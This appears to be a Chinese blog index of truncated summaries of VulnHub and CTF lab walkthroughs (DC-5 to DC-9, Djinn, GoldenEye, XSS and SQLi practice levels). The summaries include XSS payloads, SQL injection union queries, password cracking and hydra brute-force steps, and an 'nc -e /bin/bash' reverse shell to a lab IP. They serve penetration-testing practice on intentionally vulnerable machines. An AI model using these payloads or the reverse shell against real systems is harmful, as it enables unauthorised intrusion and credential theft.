随笔分类 - vulnhu
摘要:一、信息收集 ip、端口、指纹 目录扫描 查看frp文件 密码破解 失败换一个 https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py python 7z2ctf.py arjun.7z > hash john -
阅读全文
摘要:一、信息收集 信息收集 http://192.168.111.132/Hackademic_RTB1/?cat=1 http://192.168.111.132/Hackademic_RTB1/?cat=1%27 http://192.168.111.132/Hackademic_RTB1/?cat
阅读全文
摘要:一、主机探测 二、信息收集 进入21端口 发现文件并下载 下载文件 作为字典进行登录爆破 用字典爆破 ssh登录 查找信息 /etc/init.d/ssh start scp root@192.168.111.128:/root/37292.c /tmp 或者直接上传 提权
阅读全文
摘要:X00 <script>alert(1)</script> X01 </textarea><script>alert(1)</script><textarea> X02 "><script>alert(1)</script><" X03 将()替换成空字符 <script>alert`1`</scr
阅读全文
摘要:第一关 <script>alert(123)</script> "><svg onload=alert(123)> 第二关 <script>alert(123);</script> "><script>alert(123);</script> 或者 "><svg onload=alert(123)>
阅读全文
摘要:http://www.zixem.altervista.org/SQLi/ 第一关 http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+ http://www.zixem.altervista.org/SQLi/level1.
阅读全文
摘要:参考文章https://blog.csdn.net/weixin_30897079/article/details/97314476 第一关 http://www.zixem.altervista.org/XSS/1.php?name=zxm%3Cscript%3Ealert(123)%3C/scr
阅读全文
摘要:仅供个人娱乐 靶机信息 https://download.vulnhub.com/djinn/djinn.ova 一、主机探测 二、漏洞的查找和利用 21端口ftp 匿名登录 7331端口 命令执行 反弹窗口 nc -e /bin/bash 192.168.174.129 4444 尝试绕过 bas
阅读全文
摘要:仅供个人娱乐 靶机信息 https://www.vulnhub.com/entry/sunset-sunrise,406/ 一、主机探测 二、信息收集 nmap -sS -sV -T5 -A -p- http://192.168.174.132:8080/ 三、漏洞利用 构造poc http://1
阅读全文
摘要:仅供个人娱乐 靶机信息 https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 一、主机探测 二、信息收集 访问一下web站点,提示只能从本地登录,否则会被当作hacker拦截。 三、漏洞查找和利用 注册账户登录 信息收集 eweuhtan
阅读全文
摘要:仅供个人娱乐 靶机信息 下载地址:https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download 一、主机探测 二、信息收集 22/tcp filtered ssh 53/tcpopendomain 8
阅读全文
摘要:仅供个人娱乐 参考http://www.saulgoodman.cn/HA-Chanakya.html 靶机信息 https://www.vulnhub.com/entry/ha-chanakya,395/ 一、主机探测 arp-scan -l nmap -sV -p 1-65535 -A 192.
阅读全文
摘要:仅供个人娱乐 靶机信息 下载地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ 一、主机扫描 二、信息收集和漏洞利用 FTP服务允许匿名用户(anonymous)登录 或者 由于version_control存在于patrick路径
阅读全文
摘要:仅供个人娱乐 靶机信息 下载地址:https://pan.baidu.com/s/1dzs_qx-YwYHk-vanbUeIxQ 一、主机扫描 二、信息收集 三、漏洞的查找和利用 boris InvincibleHack3r 进行登录 转化为小写登录成功 pop3 为55007端口 爆破 hydra
阅读全文
摘要:仅供个人娱乐 靶机信息 下载地址:https://www.vulnhub.com/entry/homeless-1,215/ 一、主机扫描 二、信息收集 在网页源码和页面上,我们发现User-Agent 三、漏洞利用 在agaent字段填上这个图片的字段 “Cyberdog Sledding P
阅读全文
摘要:仅供个人娱乐 靶机信息 下载地址:http://www.five86.com/downloads/DC-9.zip 一、主机扫描 二、信息收集 三、漏洞查找和利用 发现search的地方可能有sql注入 1' union select 1,2,3,4,5,6# -1' union select 1,
阅读全文
摘要:仅供个人娱乐 靶机信息 下载地址:http://www.five86.com/downloads/DC-8.zip 一、主机扫描 二、信息收集 http://192.168.17.135/robots.txt 三、漏洞的查找和利用 在前面点击Details的几个链接,然后发现url里有个nid参数,
阅读全文
摘要:仅供个人娱乐 靶机信息 下载地址:http://www.five86.com/downloads/DC-7.zip 一、主机扫描 二、信息收集 或者 python3 cmseek.py --url http://192.168.17.134 寻找drup相关信息 在github找到脚本 pip3 i
阅读全文
摘要:仅供个人娱乐 靶机信息 下载地址:https://download.vulnhub.com/dc/DC-6.zip 一、主机发现 nmap -sn 192.168.216.0/24 二、端口扫描 nmap -p 1-65535 -sV 192.168.216.132 三、漏洞查找和利用 80端口 打
阅读全文
摘要:仅供个人娱乐 靶机信息 下载地址:http://www.five86.com/downloads/DC-5.zip 一、主机扫描 arp-scan -l nmap -p 1-65535 -A -sV 192.168.17.131 二、信息收集 dirb http://192.168.17.131 /
阅读全文
浙公网安备 33010602011771号